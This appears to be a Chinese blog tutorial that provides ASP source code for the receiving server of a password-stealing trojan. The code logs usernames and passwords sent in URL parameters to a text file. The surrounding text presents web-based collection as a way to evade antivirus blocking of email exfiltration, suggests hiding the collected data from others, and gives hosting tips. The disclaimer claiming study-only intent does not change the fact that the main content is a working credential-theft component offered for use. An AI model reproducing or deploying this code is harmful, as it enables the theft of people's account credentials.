声明:
我写这篇文章的目的,完全是出于个人学习研究的目的,请读者不要借此干坏事,由此
引发的一切事件责任与本人无关。
网上有铺天该地的木马,其中很多用的就是ASP收信方式,稍微懂点网页编程的人,
做一个用来接收用户信息的网页,不是一件难事。难的是客户端程序的编写,现在用邮箱收信,
已经被360和其它杀毒软件给无情地拦截了,相信网页收信方式是最好的形式,
毕竟360和其它杀毒软件等是不会拦截用户打开网页的(在黑名单的除外),收集到信息后,
我们用程序在后台打开我们的网页即可。
关于ASP收信文件的源代码,网上公布的很少,我找了下,一个都没有找到!翻了下
我的邮箱,不知什么时候(至少那时我还不会编程),我留了份ASP收信的代码,这份代码
很简单,对于要求不高的初学者来说,拿来练手,是一件愉快的事情。高级一点的收信
方式是把用户信息写进数据库或一个需要验证的页面,这样别人就不可以轻易地查看到
你获取到的信息了。本例子中,只要别人知道了ok.txt的网络路径,就可以查看了,
呵呵,是不是该改进呀!...
如果你要测试这份代码,可以用
小旋风ASP服务器
来搭建一个ASP环境,当然也可以在
网上申请免费的ASP空间,如 菲菲免费网站空间
http://www.free888.org
/
//ASP收信文件代码如下
<!--
'--------------------------------------------------------
' //为防止浏览器显示本ASP文件的注释,同时用了Html和ASP注释
'//假设本ASP文件的名字为:test.asp
'//调用本文件的形式为:http://ip/test.asp?user=xxx&pass=xxx
'//如:http://www.baidu.com/test.asp?user=123&pass=456
'
'--------------------------------------------------------
-->
<%
user=Request.QueryString("user") '保存用户提交的参数user
pass=Request.QueryString("pass") '保存用户提交的参数pass
set fs=Server.CreateObject("Scripting.FileSystemObject") '创建文件对象fs
txtPath=Server.MapPath("ok.txt") '设置要写入的文件的路径,该文件和本ASP文件在同一目录下面
set tfile=fs.OpenTextFile(txtPath,8,True) '文件存在时就打开该文件,不存在时就创建该文件
tfile.WriteLine "user=" &user&" ------> pass="&pass '将用户信息写入文件ok.txt
tfile.close
set tfile=nothing
set fs=nothing
%>
为了方便我在本机用 小旋风ASP服务器 搭建好了ASP环境
//文件目录截图如下
//浏览器访问截图如下
//效果截图如下